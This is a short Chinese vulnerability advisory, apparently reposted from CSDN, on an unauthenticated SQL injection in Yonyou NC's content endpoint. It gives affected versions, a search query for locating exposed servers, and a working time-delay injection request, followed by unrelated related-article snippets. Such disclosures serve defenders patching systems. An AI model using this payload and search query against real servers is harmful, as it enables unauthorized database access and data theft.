首页 > 数据库 >用友NC content SQL注入

用友NC content SQL注入

时间:2024-08-27 10:27:24浏览次数:15  
标签:用友 NC content 漏洞 537.36 SQL

0x01 漏洞描述:

用友NC content接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x02 影响版本:

NC63、NC633、NC65

0x03 搜索语句:

product="用友-UFIDA-NC"

0x04 漏洞复现:

GET /portal/pt/link/content?pageId=login&pk_funnode=1'waitfor+delay+'0:0:4'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36Connection: close

延时4s,执行两次

0x05 修复建议:

官方已发布升级补丁,请即时获取

https://dsp.yonyou.com

标签:用友,NC,content,漏洞,537.36,SQL
From: https://blog.csdn.net/xc_214/article/details/141550731

相关文章

  • GroupBy与DistinctBy的区别和用法(System.Linq)
    GroupBy定义:对序列中的元素进行分组返回:一个分组的集合,每个分组包含满足相同条件的元素//Createalistofpets.List<Pet>pets=newList<Pet>{newPet{Name="Barley",Age=8},newPet{Name="Boots",Age=4},......
  • Azure Function host.json 设置不起作用
    解决方案:https://github.com/Azure/azure-functions-servicebus-extension/issues/81#issuecomment-1139175220publicclassStartup:FunctionsStartup{publicoverridevoidConfigure(IFunctionsHostBuilderbuilder){vartempSer......
  • MySQL数据库定时备份的几种实现方法
    MySQL数据库定时备份的几种实现方法更新时间:2024年07月22日10:44:48  作者:师小师 本文主要介绍了MySQL数据库定时备份的几种实现方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧+目录......
  • 记一次隐藏极深的SQL注入
    前言    记录有授权的渗透测试中遇到的一些有意思的漏洞,文章内容皆已经去敏,漏洞后续均已修复,文章只做技术分享。曲折的漏洞发现    这次的漏洞发现的很有意思,得亏做足了信息收集,不放过任何一个站点,首先给的目标是一个很经典的若依框架当时一进来一看,好家......
  • 探索OpenCV:图像处理基础与实践
    探索OpenCV:图像处理基础与实践前言图像读取基础安装OpenCV库读取彩色与灰度图像RGB颜色模型颜色通道解析单通道图像显示感兴趣区域(ROI)图像处理进阶技巧图像打码图像组合图像缩放结语前言  在当今数字化时代,图像不仅是我们日常生活中不可或缺的一部分,也是科学研......
  • Autosar(Davinci) --- ADT和IDT如何Mapping
    前言    这里我们讲一下ADT如何与IDT进行Mapping一、ADT为什么要与IDT进行Mapping二、ADT和IDT如何Mapping鼠标右键【typeMappingSets】,选择【NewDatatypeMappingSet...】打开之后,我们起一个名字【DemoTypeMapping】然后选择【DataTypeMaps】来将ADT......
  • java连接sqlite数据库
    首先下载jar包(每种数据库有自己jar包)然后idea里创建新项目并且在项目里创建lib文件里面放jar包接着导入jar包然后apply->ok这样就连上如果要可视化数据库DBBrowser最后测试连接TestConnection看数据库连上没结果:......
  • sql优化-错误强制类型转换导致索引失效
    使用GaussDB数据库进行测试创建下面表,仅有一个字段a为integer类型。声明其为主键,数据库会默认为其建立索引。createtablet1(aintPRIMARYKEY);使用\d+查看表结构:gaussdb=#\d+t1Table"public.t1"Column|Type|Modifiers|......
  • 062 Finishing the Core Functionality
    示例index.html<!DOCTYPEhtml><htmllang="en"><head><metacharset="UTF-8"/><metaname="viewport"content="width=device-width,initial-scale=1.0"/><title>VueBa......
  • 基于Java+SpringBoot+Mysql实现高校教务信息系统功能设计与实现二
    一、前言介绍:1.1项目摘要高校教务信息系统课题的提出,主要源于高校日常管理工作的复杂性和重要性。作为高校的基本任务,人才培养离不开教学与管理工作的有效组织和协调。教务管理作为高校日常管理的核心组成部分,涉及教学资源的合理配置、教学过程的科学规划以及教学质量的......